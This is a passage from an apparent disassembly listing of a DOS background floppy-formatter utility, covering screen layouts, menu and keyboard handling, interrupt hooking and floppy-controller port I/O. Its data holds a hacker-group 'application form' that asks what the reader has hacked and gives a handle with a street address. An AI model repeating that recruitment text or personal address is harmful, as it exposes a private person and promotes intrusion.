01h, 06h - db 20h -data_190 dw 3120h - db 01h, 08h, 20h,0B3h, 01h - db 09h, 20h -data_191 dw 3131h - db 1 - db 0Ah, 20h,0BAh,0C8h, 01h - db 17h,0CDh,0CFh, 01h, 0Fh,0CDh - db 0CFh, 01h, 10h,0CDh,0CFh, 01h - db 15h,0CDh,0BCh, 01h, 87h,0D0h - db 1Fh,0C9h, 01h, 4Eh,0CDh,0BBh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 13h - db ' Background Diskette Formatter S' - db 'tatus Report' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0CCh, 01h, 0Ch,0CDh - db 0D1h - db 01h, 15h,0CDh,0D1h, 01h, 11h - db 0CDh - db 0D1h, 01h, 19h,0CDh,0B9h,0BAh - db ' Diskette ' - db 0B3h, 01h, 07h, 20h, 56h, 6Fh - db 6Ch, 75h, 6Dh, 65h, 01h, 08h - db 20h,0B3h, 01h, 05h, 20h, 4Eh - db 6Fh, 2Eh, 20h, 4Fh, 66h, 01h - db 06h, 20h,0B3h, 01h, 04h - db ' Total Disk Space' - db 01h, 05h, 20h,0BAh,0BAh, 01h - db 05h, 20h, 4Eh, 6Fh, 2Eh, 01h - db 04h, 20h,0B3h, 01h, 04h - db ' Serial Number' - db 01h, 04h, 20h,0B3h - db ' Bad Cluster(s) ' - db 0B3h, 01h - db 8, ' In Bytes' - db 01h, 09h, 20h,0BAh,0C7h, 01h - db 0Ch,0C4h,0C5h, 01h, 15h,0C4h - db 0C5h, 01h, 11h,0C4h,0C5h, 01h - db 19h,0C4h,0B6h - db 0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0BAh, 01h - db 0Ch, 20h,0B3h, 01h, 15h, 20h - db 0B3h, 01h, 11h, 20h,0B3h, 01h - db 19h, 20h,0BAh,0BAh, 01h, 0Ch - db 20h,0B3h, 01h, 15h, 20h,0B3h - db 01h, 11h, 20h,0B3h, 01h, 19h - db 20h,0BAh,0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h, 20h,0B3h, 01h - db 11h - db 20h - db 0B3h, 01h, 19h, 20h,0BAh,0BAh - db 01h, 0Ch, 20h,0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0BAh, 01h - db 0Ch, 20h,0B3h, 01h, 15h, 20h - db 0B3h, 01h, 11h, 20h,0B3h, 01h - db 19h, 20h,0BAh,0BAh, 01h, 0Ch - db 20h,0B3h, 01h, 15h, 20h,0B3h - db 01h, 11h, 20h,0B3h, 01h, 19h - db 20h,0BAh,0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h, 20h,0B3h, 01h - db 11h, 20h,0B3h, 01h, 19h, 20h - db 0BAh,0BAh, 01h, 0Ch, 20h,0B3h - db 01h, 15h, 20h,0B3h, 01h, 11h - db 20h,0B3h, 01h, 19h, 20h,0BAh - db 0BAh, 01h, 0Ch, 20h,0B3h, 01h - db 15h, 20h,0B3h, 01h, 11h, 20h - db 0B3h, 01h, 19h, 20h,0BAh,0BAh - db 01h, 0Ch, 20h,0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0CCh, 01h - db 0Ch,0CDh,0CFh, 01h, 15h,0CDh - db 0CFh, 01h, 11h,0CDh,0CFh, 01h - db 19h,0CDh,0B9h,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 15h - db 20h, 50h - db 'ress Any Key To Return To Main M' - db 'enu' - db 01h, 15h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh - db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh - db 0Dh, 0Ah, 0Dh, 0Ah, 20h - db 9 dup (20h) - db 0ADh - db 'aHa/nBa! Application Form! ' - db ' ', 0Dh - db 0Ah, 'What file is this?', 0Dh, 0Ah - db ' Where Did ' - db 'you get it from?', 0Dh, 0Ah, ' ' - db ' Handle:', 0Dh, 0Ah - db ' Phone #:', 0Dh, 0Ah, ' ' - db ' ', 0Dh, 0Ah, ' ' - db ' List 3 boards whe' - db 're you could be reached at: ', 0Dh - db 0Ah, 0Dh, 0Ah, ' ' - db ' Can y' - db 'ou HaCK?', 0Dh, 0Ah, ' ' - db ' List a fe' - db 'w thigs you', 27h, 've hacked:', 0Dh - db 0Ah, 0Dh, 0Ah, ' ' - db ' Ok! Send MoneY, pft,' - db ' and this letter to:', 0Dh, 0Ah, ' ' - db ' Psycho', 0Dh - db 0Ah, ' 1340 W Irving', 0Dh - db 0Ah, ' #229', 0Dh, 0Ah, ' ' - db ' Chicago, IL', 0Dh, 0Ah, ' 60' - db '613', 0Dh, 0Ah, ' ' - db ' Ok! No' - db 'w, write about yourself: ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ', 0Ch, 0 - db '.' - db 80h, 3Eh, 2Dh, 02h, 00h, 74h - db 08h, 2Eh,0FEh, 0Eh, 2Dh, 02h - db 0EBh, 09h, 90h - db 2Eh,0F6h, 06h, 2Eh, 02h, 80h - db 75h, 05h -loc_32: - jmp dword ptr cs:[195h] -loc_33: - mov word ptr cs:[1EAh],ax - mov al,0Bh - out 20h,al ; port 20h, 8259-1 int command - jmp short $+2 ; delay for I/O - in al,20h ; port 20h, 8259-1 int IRR/ISR - and al,0FEh - mov ax,word ptr cs:[1EAh] - jz loc_34 ; Jump if zero - jmp short loc_32 -loc_34: - mov word ptr cs:[1FCh],ax - mov word ptr cs:[1FEh],bx - mov word ptr cs:[208h],sp - mov word ptr cs:[20Eh],ss - mov word ptr cs:[20Ch],ds - mov word ptr cs:[210h],es - mov word ptr cs:[20Ah],bp - mov word ptr cs:[204h],si - mov word ptr cs:[206h],di - mov word ptr cs:[200h],cx - mov word ptr cs:[202h],dx - mov ds,word ptr cs:[1E2h] - mov ss,word ptr ds:[1DAh] - mov sp,word ptr ds:[1DCh] - mov es,word ptr ds:[1E4h] - mov bp,word ptr ds:[1E0h] - mov si,word ptr ds:[1D8h] - mov di,word ptr ds:[1DEh] - mov ax,word ptr ds:[1D0h] - mov bx,word ptr ds:[1D2h] - mov cx,word ptr ds:[1D4h] - mov dx,word ptr ds:[1D6h] - jmp dword ptr cs:[195h] - mov word ptr cs:[1F8h],ds - mov word ptr cs:[1F6h],ax - mov word ptr cs:[1FAh],bx - mov ds,cs:data_25 - mov bx,keybd_flags_1_ - mov ah,[bx] - and ah,0Fh - cmp ah,0Bh - jne loc_36 ; Jump if not equal - test byte ptr cs:[22Eh],0C0h - jz loc_35 ; Jump if zero - test byte ptr cs:[22Eh],40h ; '@' - jz loc_36 ; Jump if zero - or byte ptr cs:[22Eh],20h ; ' ' - jmp short loc_36 - db 90h -loc_35: - or byte ptr cs:[22Eh],80h -loc_36: - mov ax,word ptr cs:[1F6h] - mov ds,word ptr cs:[1F8h] - mov bx,word ptr cs:[1FAh] - jmp dword ptr cs:[199h] - db 2Eh, 80h, 3Eh, 2Fh, 02h, 00h - db 74h, 0Dh, 2Eh,0C6h, 06h, 2Fh - db 02h, 00h, 50h,0B0h, 66h,0E6h - db 20h, 58h,0CFh -loc_37: - jmp dword ptr cs:[19Dh] - test dl,80h - jnz loc_38 ; Jump if not zero - test byte ptr cs:[22Eh],40h ; '@' - jz loc_38 ; Jump if zero - mov word ptr cs:[1EAh],ax - pop ax - pop ax - pop ax - or ax,1 - push ax - sub sp,4 - mov ax,word ptr cs:[1EAh] - mov ah,80h - iret ; Interrupt return -sub_2 endp - - -; -; SUBROUTINE -; - -sub_6 proc near -loc_38: - jmp dword ptr cs:[1A1h] - mov byte ptr ds:[22Eh],40h ; '@' - call sub_28 - jnc loc_40 ; Jump if carry=0 - clc ; Clear carry flag -loc_39: - call sub_11 - jmp loc_121 -loc_40: - mov ds,data_25 - test byte ptr ds:dsk_motor_stat_,0Fh - push cs - pop ds - jnz loc_39 ; Jump if not zero - call sub_22 - call sub_23 -loc_41: - mov ax,55Ch - mov cs:data_93,ax - call sub_21 - mov data_112,70h ; 'p' - call sub_27 - call sub_13 -loc_42: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_48 ; Jump if equal - cmp al,0Dh - je loc_49 ; Jump if equal - cmp ah,48h ; 'H' - je loc_50 ; Jump if equal - cmp ah,50h ; 'P' - je loc_53 ; Jump if equal - and al,0DFh - cmp al,50h ; 'P' - je loc_43 ; Jump if equal - cmp al,52h ; 'R' - je loc_47 ; Jump if equal - cmp al,45h ; 'E' - je loc_48 ; Jump if equal - cmp al,53h ; 'S' - je loc_44 ; Jump if equal - cmp al,46h ; 'F' - je loc_45 ; Jump if equal - cmp al,54h ; 'T' - je loc_46 ; Jump if equal - call sub_11 - jmp short loc_42 -loc_43: - jmp loc_137 -loc_44: - jmp short loc_55 - db 90h -loc_45: - jmp loc_145 -loc_46: - jmp loc_149 -loc_47: - jmp loc_151 -loc_48: - jmp loc_154 -loc_49: - mov al,3 - mul data_107 ; ax = data * al - add ax,offset loc_43 - jmp ax ;*Register jump -loc_50: - mov data_112,1Fh - call sub_27 - cmp data_107,0 - je loc_52 ; Jump if equal - dec data_107 - sub data_110,3 -loc_51: - mov data_112,70h ; 'p' - call sub_27 - jmp short loc_42 -loc_52: - mov data_107,5 - mov data_110,15h - jmp short loc_51 -loc_53: - mov data_112,1Fh - call sub_27 - cmp data_107,5 - je loc_54 ; Jump if equal - inc data_107 - add data_110,3 - jmp short loc_51 -loc_54: - mov data_107,0 - mov data_110,6 - jmp short loc_51 -loc_55: - call sub_19 - mov data_190,3120h - cmp data_28,1 - jne loc_56 ; Jump if not equal - mov data_29,0 - jmp short loc_60 - db 90h -loc_56: - mov dh,0Dh - mov dl,18h - mov si,232h - call sub_14 - call sub_13 - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - jne loc_57 ; Jump if not equal - jmp loc_41 -loc_57: - cmp al,0Dh - je loc_60 ; Jump if equal - and al,0DFh - sub al,41h ; 'A' - jge loc_59 ; Jump if > or = -loc_58: - call sub_11 - jmp short loc_55 -loc_59: - cmp al,data_28 - jge loc_58 ; Jump if > or = - mov data_29,al - add al,41h ; 'A' - mov byte ptr ds:[24Eh],al ; ('A') - mov data_183,al - mov data_188,al -loc_60: - call sub_19 - call sub_37 - test byte ptr [bx],1 - jz loc_63 ; Jump if zero - mov dh,10h - mov dl,14h - test byte ptr [bx],2 - jnz loc_61 ; Jump if not zero - mov si,251h - jmp short loc_62 - db 90h -loc_61: - mov si,27Eh -loc_62: - call sub_14 - call sub_13 - mov al,31h ; '1' - mov data_102,al - mov al,[si-3] - mov data_103,al - mov data_89,1331h - call sub_16 - and byte ptr [si-3],0FEh - or [si-3],al - xor al,1 - xor data_31,ax -loc_63: - mov ax,data_31 - call sub_39 -loc_64: - call sub_20 - mov dh,0Bh - mov dl,14h - mov si,2ABh - call sub_14 - call sub_38 - cmp data_101,0 - je loc_69 ; Jump if equal - mov ax,word ptr ds:[137h] - mov bx,ax - cmp data_101,1 - jne loc_65 ; Jump if not equal - xchg bh,bl - xor bl,bl ; Zero register - sub al,30h ; '0' - jmp short loc_67 - db 90h -loc_65: - sub al,27h ; ''' - cmp al,0Ah - jg loc_64 ; Jump if > - jz loc_66 ; Jump if zero - xor al,al ; Zero register -loc_66: - sub ah,30h ; '0' - add al,ah - cmp al,0Bh - jg loc_64 ; Jump if > -loc_67: - cmp al,0 - je loc_64 ; Jump if equal - mov data_96,al - or bl,20h ; ' ' - cmp bl,30h ; '0' - jne loc_68 ; Jump if not equal - mov bl,20h ; ' ' -loc_68: - mov data_191,bx - mov data_182,bx -loc_69: - mov data_100,0F5h - mov data_95,0 - mov data_99,0 - call sub_20 - mov dh,0Ah - mov dl,18h - mov si,2DAh - call sub_14 - mov dh,0Ch - mov dl,13h - mov si,2FBh - call sub_14 - call sub_13 -loc_70: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - je loc_72 ; Jump if equal - cmp al,1Bh - jne loc_71 ; Jump if not equal - jmp loc_41 -loc_71: - call sub_11 - jmp short loc_70 -loc_72: - mov data_82,1525h - cli ; Disable interrupts - pushf ; Push flags - push cs - mov ax,201h - mov bx,28E9h - mov cx,1 - mov dl,data_29 - xor dh,dh ; Zero register - call sub_6 - jnc loc_78 ; Jump if carry=0 - clc ; Clear carry flag - test ah,80h - jz loc_78 ; Jump if zero - call sub_11 - xor cx,cx ; Zero register - -locloop_73: - loop locloop_73 ; Loop if cx > 0 - - call sub_11 - call sub_56 - call sub_20 - mov dh,0Ah - mov dl,20h ; ' ' - mov si,3DAh - call sub_14 -loc_74: - mov dh,0Eh - mov dl,20h ; ' ' - mov si,40Fh - call sub_14 - call sub_13 -loc_75: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_77 ; Jump if equal - and al,0DFh - cmp al,52h ; 'R' - jne loc_76 ; Jump if not equal - jmp data_82 -loc_76: - cmp al,41h ; 'A' - je loc_77 ; Jump if equal - call sub_11 - jmp short loc_75 -loc_77: - jmp loc_135 -loc_78: - call sub_24 - call sub_61 - or byte ptr ds:[22Eh],80h - cli ; Disable interrupts - call sub_7 -loc_79: - call sub_52 - call sub_60 - mov data_82,1596h - call sub_64 - test data_73,0C0h - jz loc_80 ; Jump if zero - call sub_64 - test data_73,0C0h - jz loc_80 ; Jump if zero - jmp loc_123 -loc_80: - call sub_74 - test data_73,0C0h - jz loc_81 ; Jump if zero - jmp short loc_83 - db 90h -loc_81: - cmp byte ptr ds:[230h],0 - je loc_82 ; Jump if equal - mov ax,word ptr ds:[243Dh] - cmp data_218,ax - jne loc_82 ; Jump if not equal - mov ax,word ptr ds:[243Fh] - cmp data_219,ax - jne loc_82 ; Jump if not equal - jmp loc_117 -loc_82: - cmp byte ptr data_214,0EBh - jne loc_83 ; Jump if not equal - cmp data_217,200h - jne loc_83 ; Jump if not equal - mov data_84,1626h - jmp short loc_84 - db 90h -loc_83: - mov data_84,1623h -loc_84: - call sub_77 - jnc loc_85 ; Jump if carry=0 - jmp loc_123 -loc_85: - test al,40h ; '@' - jz loc_87 ; Jump if zero -loc_86: - mov data_62,3 - jmp loc_125 -loc_87: - mov byte ptr ds:[230h],0 -loc_88: - mov data_82,161Fh -loc_89: - jmp data_84 - call sub_78 - mov data_68,28E9h - mov ax,word ptr data_60 - mov data_67,ax - mov data_69,42h ; 'B' - mov data_70,0E6h - mov data_85,27F1h - call sub_75 - test data_73,0C0h - jz loc_95 ; Jump if zero - test data_74,20h ; ' ' - jz loc_90 ; Jump if zero - cmp data_94,2 - je loc_93 ; Jump if equal - inc data_94 - jmp short loc_91 - db 90h -loc_90: - mov data_94,0 -loc_91: - call sub_65 - test data_73,0C0h - jz loc_92 ; Jump if zero - jmp loc_123 -loc_92: - mov data_84,1623h - jmp short loc_88 -loc_93: - mov data_94,0 - cmp data_65,0 - jne loc_94 ; Jump if not equal - jmp loc_105 -loc_94: - call sub_51 -loc_95: - cmp data_64,0 - jne loc_97 ; Jump if not equal - mov data_64,1 -loc_96: - jmp short loc_89 -loc_97: - call sub_9 - mov data_82,161Fh - mov data_64,0 - inc data_65 - inc data_63 - cmp data_31,0 - jne loc_98 ; Jump if not equal - inc data_63 -loc_98: - call sub_46 - cmp data_63,50h ; 'P' - jge loc_99 ; Jump if > or = - call sub_63 - test data_73,0C0h - jz loc_96 ; Jump if zero - call sub_65 - test data_73,0C0h - jz loc_96 ; Jump if zero - jmp short loc_100 - db 90h -loc_99: - mov data_65,0 - mov data_63,0 - mov data_66,1 - mov data_64,0 - mov data_59,0 - call sub_63 - test data_73,0C0h - jz loc_101 ; Jump if zero - call sub_65 - test data_73,0C0h - jz loc_101 ; Jump if zero -loc_100: - mov data_62,40h ; '@' - jmp loc_125 -loc_101: - mov data_82,1712h - call sub_78 - cmp data_64,1 - je loc_102 ; Jump if equal - mov data_64,1 - jmp short loc_101 -loc_102: - call sub_52 - mov ds,data_25 - mov ax,word ptr ds:timer_low_+1 - push cs - pop ds - mov word ptr ds:[243Dh],ax -loc_103: - mov data_82,1738h - mov data_64,0 - mov data_68,2416h - mov data_67,1FFh - mov data_69,4Ah ; 'J' - mov data_70,0C5h - mov data_85,27F1h - call sub_75 - test data_73,0C0h - jz loc_106 ; Jump if zero - test data_74,2 - jz loc_104 ; Jump if zero - jmp loc_86 -loc_104: - cmp data_94,0 - jne loc_105 ; Jump if not equal - inc data_94 - call sub_65 - test data_73,0C0h - jz loc_103 ; Jump if zero - jmp loc_123 -loc_105: - mov data_62,20h ; ' ' - jmp loc_125 -loc_106: - call sub_53 - mov byte ptr ds:[21Ah],2 - mov al,byte ptr ds:[242Bh] - mov data_214,al - mov data_215,0FFFFh - mov word ptr ds:[223h],0 - mov word ptr ds:[21Fh],0 - mov word ptr ds:[212h],139h -loc_107: - mov cx,80h - mov si,word ptr ds:[212h] -loc_108: - mov word ptr ds:[218h],cx - mov word ptr ds:[214h],si - call sub_55 - sub ax,word ptr ds:[21Fh] - test cx,[si] - jz loc_113 ; Jump if zero - cmp ax,200h - jl loc_109 ; Jump if < - mov word ptr ds:[21Bh],ax - call sub_49 - call sub_53 - call sub_50 - mov ax,word ptr ds:[21Bh] - sub ax,200h -loc_109: - mov di,offset data_214 - add di,ax - mov al,data_56 - cbw ; Convrt byte to word - cmp al,9 - jne loc_110 ; Jump if not equal - clc ; Clear carry flag - rcr ax,1 ; Rotate thru carry - adc ax,0 -loc_110: - mov cx,ax - mov si,word ptr ds:[229h] -loc_111: - mov bx,225h - mov ax,[bx+si] - mov bx,[di] - or ax,bx - cld ; Clear direction - stosw ; Store ax to es:[di] - xor si,2 - nop ;*ASM fixup - sign extn byte - jz loc_112 ; Jump if zero - dec di -loc_112: - dec cx - jnz loc_111 ; Jump if not zero - mov word ptr ds:[21Dh],di - jmp short loc_114 - db 90h -loc_113: - cmp ax,200h - jl loc_114 ; Jump if < - call sub_49 - call sub_53 - call sub_50 -loc_114: - mov word ptr ds:[21Bh],ax - mov al,data_56 - cbw ; Convrt byte to word - add word ptr ds:[223h],ax - mov ax,word ptr ds:[21Bh] - mov cx,word ptr ds:[218h] - mov si,word ptr ds:[214h] - shr cx,1 ; Shift w/zeros fill - jz loc_115 ; Jump if zero - jmp loc_108 -loc_115: - inc word ptr ds:[212h] - mov ax,word ptr ds:[212h] - cmp ax,word ptr ds:[216h] - je loc_116 ; Jump if equal - jmp loc_107 -loc_116: - call sub_49 - call sub_54 - mov di,data_100 - mov ax,word ptr ds:[243Fh] - xchg ah,al - cld ; Clear direction - stosw ; Store ax to es:[di] - mov ax,word ptr ds:[243Dh] - xchg ah,al - stosw ; Store ax to es:[di] - mov ax,word ptr data_98 - stosw ; Store ax to es:[di] - mov data_100,di - inc data_95 - inc data_99 - call sub_12 - mov al,data_96 - cmp data_95,al - je loc_119 ; Jump if equal -loc_117: - mov byte ptr ds:[230h],1 - mov ds,data_25 - mov byte ptr ds:dsk_motor_tmr_,2 - push cs - pop ds - mov data_92,3AAh - call sub_45 - mov cx,88h - -locloop_118: - call sub_7 - call sub_9 - mov cx,word ptr ds:[22Bh] - mov data_82,1596h - loop locloop_118 ; Loop if cx > 0 - - jmp loc_79 -loc_119: - mov data_92,3C2h - call sub_45 - mov data_107,2 - mov data_110,0Ch -loc_120: - mov data_81,130Dh - mov byte ptr ds:[230h],0 - call sub_8 -loc_121: - and byte ptr ds:[22Eh],0 - mov sp,2B84h - mov ax,202h - push ax - push cs - mov ax,data_81 - push ax - mov word ptr cs:[1DCh],sp -loc_122: - mov ss,word ptr ds:[20Eh] - mov sp,word ptr ds:[208h] - mov es,word ptr ds:[210h] - mov bp,word ptr ds:[20Ah] - mov si,word ptr ds:[204h] - mov di,word ptr ds:[206h] - mov ax,word ptr ds:[1FCh] - mov bx,word ptr ds:[1FEh] - mov cx,word ptr ds:[200h] - mov dx,word ptr ds:[202h] - mov ds,word ptr ds:[20Ch] - iret ; Interrupt return -loc_123: - mov byte ptr ds:[22Fh],0 - mov dx,3F2h - mov al,8 - out dx,al ; port 3F2h, dsk0 contrl output - cmp byte ptr ds:[230h],0 - je loc_124 ; Jump if equal - jmp loc_117 -loc_124: - mov data_62,80h -loc_125: - mov data_92,3B6h - call sub_45 - call sub_12 - mov byte ptr ds:[22Dh],6 - call sub_7 - call sub_12 - call sub_8 - mov data_81,195Dh - jmp short loc_121 -sub_6 endp - -loc_126: - and byte ptr cs:[22Eh],7Fh - call sub_28 - jnc loc_128 ; Jump if carry=0 - clc ; Clear carry flag - call sub_11 - test byte ptr ds:[22Eh],20h ; ' ' - jnz loc_127 ; Jump if not zero - jmp loc_121 -loc_127: - jmp loc_120 -loc_128: - call sub_22 - call sub_23 - call sub_56 - call sub_20 - cmp data_62,80h - je loc_129 ; Jump if equal - cmp data_62,3 - je loc_132 ; Jump if equal - cmp data_62,40h ; '@' - je loc_131 ; Jump if equal - cmp data_62,20h ; ' ' - je loc_130 ; Jump if equal - mov dh,0Ah - mov dl,1Eh - mov si,441h - call sub_14 - jmp short loc_133 - db 90h -loc_129: - mov dh,0Ah - mov dl,20h ; ' ' - mov si,3DAh - call sub_14 - jmp short loc_133 - db 90h -loc_130: - mov dh,0Ah - mov dl,18h - mov si,420h - call sub_14 - jmp short loc_133 - db 90h -loc_131: - mov dh,0Ah - mov dl,22h ; '"' - mov si,402h - call sub_14 - jmp short loc_133 - db 90h -loc_132: - mov dh,0Ah - mov dl,1Dh - mov si,3EBh - call sub_14 -loc_133: - mov dh,0Eh - mov dl,20h ; ' ' - mov data_62,0 - mov si,40Fh - call sub_14 - call sub_13 -loc_134: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_135 ; Jump if equal - and al,0DFh - cmp al,52h ; 'R' - je loc_136 ; Jump if equal - cmp al,41h ; 'A' - je loc_135 ; Jump if equal - call sub_11 - jmp short loc_134 -loc_135: - call sub_24 - mov data_107,0 - mov data_110,6 - jmp loc_120 -loc_136: - call sub_24 - cli ; Disable interrupts - mov byte ptr ds:[22Eh],0C0h - call sub_7 - call sub_65 - mov cx,5 - jmp data_82 -loc_137: - call sub_19 - mov dh,0Dh - mov dl,15h - mov si,457h - call sub_14 - call sub_13 -loc_138: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_144 ; Jump if equal - cmp al,0Dh - je loc_139 ; Jump if equal - call sub_11 - jmp short loc_138 -loc_139: - call sub_19 - mov dh,0Dh - mov dl,21h ; '!' - mov si,47Fh - call sub_14 - call sub_13 - mov bp,0A2Bh -loc_140: - mov ah,2 - xor dx,dx ; Zero register - int 17h ; Printer dx=prn1, ah=func 02h - ; read status, ah=return status - test ah,10h - jz loc_143 ; Jump if zero - mov al,[bp] - cmp al,0 - je loc_144 ; Jump if equal - xor ah,ah ; Zero register - xor dx,dx ; Zero register - int 17h ; Printer dx=prn1, ah=func 00h - ; print char al, get status ah - test ah,29h ; ')' - jnz loc_141 ; Jump if not zero - inc bp - jmp short loc_140 -loc_141: - call sub_19 - mov dh,0Ch - mov dl,23h ; '#' - mov si,48Dh -loc_142: - call sub_14 - mov data_82,1A2Eh - jmp loc_74 -loc_143: - call sub_19 - mov dh,0Ch - mov dl,1Eh - mov si,499h - jmp short loc_142 -loc_144: - jmp loc_41 -loc_145: - cmp data_95,0 - jne loc_147 ; Jump if not equal - call sub_19 - mov dh,0Dh - mov dl,20h ; ' ' - mov si,38Dh - call sub_14 -loc_146: - mov dh,0Fh - mov dl,16h - mov si,368h - call sub_14 - call sub_13 - jmp short loc_148 - db 90h -loc_147: - mov ax,838h - mov cs:data_93,ax - call sub_21 - call sub_31 -loc_148: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - mov data_107,5 - mov data_110,15h - jmp loc_41 -loc_149: - cmp data_187,6666h - je loc_150 ; Jump if equal - mov data_187,6666h - jmp loc_41 -loc_150: - mov data_187,206Eh - jmp loc_41 -loc_151: - mov ax,11E0h - mov di,20h ; (' ') - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,12E6h - mov di,offset data_42 - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,12CCh - mov di,offset data_38 - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,127Ah - mov di,24h ; (' ') - call sub_30 - jnc loc_153 ; Jump if carry=0 -loc_152: - clc ; Clear carry flag - call sub_19 - mov dh,0Ch - mov dl,8 - mov si,327h - call sub_14 - jmp loc_146 -loc_153: - xor ax,ax ; Zero register - mov word ptr data_24,ax - mov si,offset 195h - mov di,20h ; (' ') - call sub_29 - mov si,offset 199h - mov di,24h ; (' ') - call sub_29 - mov si,offset 19Dh - mov di,offset data_38 - call sub_29 - mov si,offset 1A1h - mov di,offset data_42 - call sub_29 - mov es,data_26 - mov di,data_2e - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - mov es,data_27 - mov di,data_2e - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - push cs - pop es - call sub_24 - call sub_7 -loc_154: - mov data_107,0 - mov data_110,6 - call sub_24 - jmp loc_121 - -; -; SUBROUTINE -; - -sub_7 proc near - add byte ptr ds:[22Dh],1 - cli ; Disable interrupts - mov word ptr ds:[1D0h],ax - pop ax - pushf ; Push flags - push cs - push ax - mov word ptr ds:[1DCh],sp - mov word ptr ds:[1D2h],bx - mov word ptr ds:[1DAh],ss - mov word ptr ds:[1E2h],ds - mov word ptr ds:[1E4h],es - mov word ptr ds:[1E0h],bp - mov word ptr ds:[1D8h],si - mov word ptr ds:[1DEh],di - mov word ptr ds:[1D4h],cx - mov word ptr ds:[1D6h],dx - jmp loc_122 -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - mov al,data_29 - cbw ; Convrt byte to word - mov di,ax - mov ds,data_25 - and byte ptr ds:hdsk0_media_st_[di],0EFh - mov byte ptr ds:dsk_motor_tmr_,2 - mov byte ptr ds:dsk_recal_stat_,0 - push cs - pop ds - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - mov word ptr ds:[22Bh],cx - test byte ptr ds:[22Eh],20h ; ' ' - jz loc_ret_155 ; Jump if zero - pop ax - mov data_82,ax - jmp loc_126 - -loc_ret_155: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push ax - push bx - mov al,7 - call sub_10 - pop bx - pop ax - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - call sub_7 - mov al,0B6h - out 43h,al ; port 43h, 8253 wrt timr mode - mov ax,180h - out 42h,al ; port 42h, 8253 timer 2 spkr - mov al,ah - out 42h,al ; port 42h, 8253 timer 2 spkr - in al,61h ; port 61h, 8255 port B, read - or al,3 - out 61h,al ; port 61h, 8255 B - spkr, etc - call sub_7 - in al,61h ; port 61h, 8255 port B, read - and al,0FCh - out 61h,al ; port 61h, 8255 B - spkr, etc - ; al = 0, disable parity - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - mov ah,2 - mov dx,2000h - mov bh,data_104 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - mov ah,2 - mov bh,0 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - call sub_15 - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near -loc_156: - cld ; Clear direction - lodsb ; String [si] to al - cmp al,0 - je loc_ret_157 ; Jump if equal - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_156 - -loc_ret_157: - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near -loc_158: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - jne loc_159 ; Jump if not equal - pop ax - jmp data_89 -loc_159: - cmp al,0Dh - jne loc_160 ; Jump if not equal - mov al,data_103 - jmp short loc_161 - db 90h -loc_160: - cmp al,30h ; '0' - jl loc_162 ; Jump if < - cmp al,data_102 - jg loc_162 ; Jump if > -loc_161: - and ax,7 - retn -loc_162: - call sub_11 - jmp short loc_158 -sub_16 endp - - -; -; SUBROUTINE -; - -sub_17 proc near - mov cx,0FA0h - shr cx,1 ; Shift w/zeros fill - cld ; Clear direction - lodsb ; String [si] to al - inc si - xchg ah,al -loc_163: - lodsb ; String [si] to al - dec cx - jz loc_165 ; Jump if zero - inc si - cmp ah,al - jne loc_164 ; Jump if not equal - inc bx - jmp short loc_163 -loc_164: - call sub_26 - jmp short loc_163 -loc_165: - call sub_26 - retn -sub_17 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - push ds - push es - mov si,data_1e - mov 